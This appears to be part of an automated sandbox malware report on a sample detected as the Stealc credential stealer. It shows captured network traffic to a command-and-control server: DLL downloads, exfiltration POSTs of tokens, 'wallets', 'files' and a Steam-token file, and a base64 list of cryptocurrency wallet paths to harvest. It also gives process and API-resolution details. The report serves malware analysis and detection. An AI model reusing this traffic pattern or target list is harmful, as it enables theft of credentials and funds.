00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 28, 2024 21:26:16.398802042 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 21:26:16.621262074 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 28, 2024 21:26:18.301070929 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 21:26:18.529153109 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 28, 2024 21:26:18.705780983 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 21:26:18.928431988 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 28, 2024 21:26:19.418040991 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 21:26:20.144702911 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:20.611637115 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"wallets------FBKFCFBFIDGCGDHJDBKF--
Sep 28, 2024 21:26:20.837271929 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:20 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 28, 2024 21:26:20.839437962 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJ Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 2d 2d 0d 0a Data Ascii: ------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="message"files------BAECFCAAECBGDGDHIEHJ--
Sep 28, 2024 21:26:21.064023972 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:21.076345921 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="file"------CBFBGCGIJKJJKFIDBFCG--
Sep 28, 2024 21:26:21.794778109 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:21.822144032 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFIEHCFIECBGCBFHIJJ Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------FCFIEHCFIECBGCBFHIJJContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------FCFIEHCFIECBGCBFHIJJContent-Disposition: form-data; name="message"ybncbhylepme------FCFIEHCFIECBGCBFHIJJ--
Sep 28, 2024 21:26:22.267699003 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:22 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2338 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Sep 28, 2024 21:26:22.269021034 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKK Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGIIJDHCGCBKECBFIJKK--
Sep 28, 2024 21:26:22.992638111 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	15:26:03
Start date:	28/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x470000
File size:	1'849'856 bytes
MD5 hash:	ACF1DEDE1E9BB45CE49AC994C7A0BBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1700366205.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00489860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01102260), ref: 004898A1
GetProcAddress.KERNEL32(74DD0000,01102410), ref: 004898BA
GetProcAddress.KERNEL32(74DD0000,011024D0), ref: 004898D2
GetProcAddress.KERNEL32(74DD0000,01102428), ref: 004898EA
GetProcAddress.KERNEL32(74DD0000,01102440), ref: 00489903
GetProcAddress.KERNEL32(74DD0000,01109058), ref: 0048991B
GetProcAddress.KERNEL32(74DD0000,010F5710), ref: 00489933
GetProcAddress.KERNEL32(74DD0000,010F5A50), ref: 0048994C
GetProcAddress.KERNEL32(74DD0000,011022A8), ref: 00489964
GetProcAddress.KERNEL32(74DD0000,011022C0), ref: 0048997C
GetProcAddress.KERNEL32(74DD0000,011022D8), ref: 00489995
GetProcAddress.KERNEL32(74DD0000,011022F0), ref: 004899AD
GetProcAddress.KERNEL32(74DD0000,010F5730), ref: 004899C5
GetProcAddress.KERNEL32(74DD0000,01102278), ref: 004899DE
GetProcAddress.KERNEL32(74DD0000,01102308), ref: 004899F6
GetProcAddress.KERNEL32(74DD0000,010F5A70), ref: 00489A0E
GetProcAddress.KERNEL32(74DD0000,01102458), ref: 00489A27
GetProcAddress.KERNEL32(74DD0000,01102338), ref: 00489A3F
GetProcAddress.KERNEL32(74DD0000,010F5870), ref: 00489A57
GetProcAddress.KERNEL32(74DD0000,011024E8), ref: 00489A70
GetProcAddress.KERNEL32(74DD0000,010F5750), ref: 00489A88
LoadLibraryA.KERNEL32(011025D8,?,00486A00), ref: 00489A9A
LoadLibraryA.KERNEL32(01102590,?,00486A00), ref: 00489AAB
LoadLibraryA.KERNEL32(01102578,?,00486A00), ref: 00489ABD
LoadLibraryA.KERNEL32(01102518,?,00486A00), ref: 00489ACF
LoadLibraryA.KERNEL32(011025A8,?,00486A00), ref: 00489AE0
GetProcAddress.KERNEL32(75A70000,01102530), ref: 00489B02
GetProcAddress.KERNEL32(75290000,01102548), ref: 00489B23
GetProcAddress.KERNEL32(75290000,01102560), ref: 00489B3B
GetProcAddress.KERNEL32(75BD0000,011025C0), ref: 00489B5D
GetProcAddress.KERNEL32(75450000,010F58D0), ref: 00489B7E
GetProcAddress.KERNEL32(76E90000,01108F58), ref: 00489B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00489BB6

Strings

NtQueryInformationProcess, xrefs: 00489BAA

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
